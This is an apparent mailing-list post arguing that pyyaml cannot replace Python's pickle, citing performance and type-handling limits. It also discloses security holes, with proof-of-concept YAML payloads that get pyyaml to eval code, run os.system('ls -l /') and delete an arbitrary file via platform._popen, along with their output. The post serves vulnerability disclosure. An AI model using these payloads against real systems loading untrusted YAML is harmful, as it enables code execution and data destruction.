[Long post. Summary is I've found three exploits in
pyyaml and at least five limitations w.r.t. the existing
Python pickles. I DO NOT recommend anyone use pyyaml
when the input comes from untrusted code.
REPEAT: pyyaml allows ARBITRARY CODE TO BE EXECUTED.]
Me:
Conceptually, yes. That code would work fine with a full YAML
implementation. Admittedly, the current pure-Python implementation is
not yet complete. I didn't mean to imply that the current YAML
implementations were drop-in replacements for Pickle, only that the
concept of YAML is deserving of more attention.
This original thread started with you asking:
> Is there any benefit to Pickle over YAML?
You have since distinguished between two YAMLs, the conceptual
one and the concrete one.
If it's the latter then the answer we've made several times
is that YAML as currently implemented is not able to replace
pickle. You here agree with us.
Let's suppose YAML-the-concept was implemented. That's
going to call for a lot of work so that the implementation
meets the concept, and well beyond what's been done so far.
For example, to be a viable pickle replacement will require
a C implementation because the performance is important.
The pure Python version "pickle.py" wasn't fast enough so
Someone (Jim Fulton, as I recall) contributed cPickle.
You'll also need a non-recursive implementation. Here's
a test with the pyyaml version I just got from svn using
a very deep data structure. It hits Python's recursion
limit:
.... x = (x,)
....Traceback (most recent call last):
File "<stdin>", line 1, in ?
File "yaml/dump.py", line 18, in dump
return Dumper().dump(*data)
File "yaml/dump.py", line 43, in dump
self.dumpDocuments(data)
File "yaml/dump.py", line 61, in dumpDocuments
self.dumpData(obj)
File "yaml/dump.py", line 90, in dumpData
.....
self.dumpList(data)
File "yaml/dump.py", line 138, in dumpList
self.indentDump(item)
File "yaml/dump.py", line 67, in indentDump
self.dumpData(data)
RuntimeError: maximum recursion depth exceeded
It doesn't handle tuples, only lists
>>> print yaml.load(yaml.dump( (1,2,3) )).next() [1, 2, 3]
>>>
I see it doesn't handle Unicode correctly. Here
it doesn't round-trip a Unicode character back to
Unicode.
Digging deeper into the YAML implementation I see
it really doesn't handle Unicode correctly -- there's
even a *MAJOR* security hole. Watch this. I'll
start with a hand-crafted YAML file and read it.
% cat test.yaml
--- "\u000a"+' '.join(__import__('os').listdir('.')) + ""
% python
Python 2.4a2 (#1, Aug 29 2004, 22:30:12)
[GCC 3.3 20030304 (Apple Computer, Inc. build 1495)] on darwin
Type "help", "copyright", "credits" or "license" for more information.u'\n.svn assets docs examples experimental patches README scripts
setup.py test.yaml TESTING yaml'
See how it eval'ed the embedded and artibrary
Python code in the string it thought was Unicode?
That's because the code in implicit.py doesn't fully
verify the string before eval'ing it, in
if val[0] == '"' and val[-1] == '"':
if re.search(r"\u", val):
val = "u" + val
unescapedStr = eval (val)
This code is also suspect, from klass.py
def makeClass(module, classname, dict):
exec('import %s' % (module))
klass = eval('%s.%s' % (module, classname))
obj = new.instance(klass)
if hasMethod(obj, 'from_yaml'):
return obj.from_yaml(dict)
obj.__dict__ = dict
return obj
Yep, here's an exploit against it. The chr(32) is needed because
there's some sort of split on space upstream so I can't embed
spaces directly. But I can construct them so this shows that
I can pass arbitrary commands to the shell. (Note: the s= ...
assignment is all on one line.)
total 326905
drwxrwxr-x 51 root admin 1734 12 Sep 19:16 Applications
drwxrwxr-x 21 root admin 714 21 Jun 2003 Applications (Mac OS 9)
lrwxr-xr-x 1 root admin 15 17 Feb 2003 Desktop (Mac OS 9)
rebuild
... many lines delete ...
drwxr-xr-x 12 root wheel 408 12 Sep 2003 usr
lrwxr-xr-x 1 root admin 11 14 Feb 2004 var -> private/var
Traceback (most recent call last):
File "<stdin>", line 1, in ?
File "yaml/load.py", line 83, in next
return self.parse_value(indicator)
File "yaml/load.py", line 168, in parse_value
value = self.parse_unaliased_value(value)
File "yaml/load.py", line 179, in parse_unaliased_value
return self.typeResolver.resolveType(value, url)
File "yaml/klass.py", line 12, in resolveType
return makeClass(moduleName, className, data)
File "yaml/klass.py", line 16, in makeClass
klass = eval('%s.%s' % (module, classname))
File "<string>", line 1
os;os.system("ls"+chr(32)+"-l"+chr(32)+"/");1.2
^
SyntaxError: invalid syntax
Note that I was able to generate the os.system call
before the SyntaxError.
Here's another exploit. It's a variation of the "delete
an arbitrary file" example I posted that you replied could
be made secure "conceptually". It works because the
platform._popen class deletes the temporary file on __del__.
[Andrew-Dalkes-Computer:~/cvses/pyyaml/trunk] dalke% cat rmfile.yaml
--- !!platform._popen
bufsize: ~
mode: r
pipe: ~
tmpfile: delete_this_file.txt
% ls -l delete_this_file.txt
-rw-r--r-- 1 dalke staff 28 19 Sep 23:00 delete_this_file.txt
% python
Python 2.4a2 (#1, Aug 29 2004, 22:30:12)
[GCC 3.3 20030304 (Apple Computer, Inc. build 1495)] on darwin
Type "help", "copyright", "credits" or "license" for more information.% ls -l delete_this_file.txt
ls: delete_this_file.txt: No such file or directory
%
Oh, and I already mentioned that you need support
for __slots__. It also looks like pyyaml doesn't support
classes derived from builtins, as in
.... def blah(self): print "blah blah"
....
>>> x=MyList([1,3,5])
>>> x [1, 3, 5]
>>> x.blah() blah blah
>>> print yaml.dump(x) --- [1, 3, 5]
>>> yaml.load(yaml.dump(x)).next() [1, 3, 5]
>>> yaml.load(yaml.dump(x)).next().blah()
Traceback (most recent call last):
Because YAML the implementation is so far from YAML
the concept, and YAML the implementation is at least
as insecure as pickle, why should we look at YAML
any further?
In fact, I wouldn't even use pyyaml now for any of
my projects knowing just how insecure it is.
> Given that Pickle is insecure, wouldn't it make
> more sense to support a secure serialization format,
> one that's even readable to boot, such as YAML?
Again, please tell me how you can have a "secure
serialization format" which prevents my "__del__
calls os.unlink on arbitrary filename" attack. You've
said it's possible in the abstract. The only way
I know is to register the classes that are safe
to deserialize. But pickles already allow that.
So how would YAML-the-conceptual be any more
secure than pickles as they've existed for years?
And how long would it be until YAML-the-implementation
hopes to be comparable to pickles for both speed
and security?
For that matter, why doesn't pyyaml use the existing
protocol in Python to ask an instance for how to
serialize itself? Why does it need to define a new one?
Finally, you said
> the concept of YAML is deserving of more attention.
What is the concept? Why is it more deserving
than, say, XML-RPC encoding, or SOAP's, or CORBA's
serialization, or David Mertz' xml_pickle, or
Twisted's jelly, or any of a dozen other
serializations?
- it's not as fast, nor as small as a binary pickle
done with cPickle
- it doesn't understand tuples vs. lists
- it doesn't have the buzz of XML (and XML
advocates also claim readability)
- it doesn't have jelly's upversioning support (when
I looked at it, Twisted allowed classes to
describe how to upgrade older pickles to conform
with changes in the class)
- it doesn't have the validation tools that CORBA
has to ensure that received data fields are at
least the correct types
Some are limitations of the implementation, but the
bar is pretty high so it's up to the advocates (and
of the years YAML's been about you're the first I've
seen) to prove it's deserving.
Andrew
(e-mail address removed)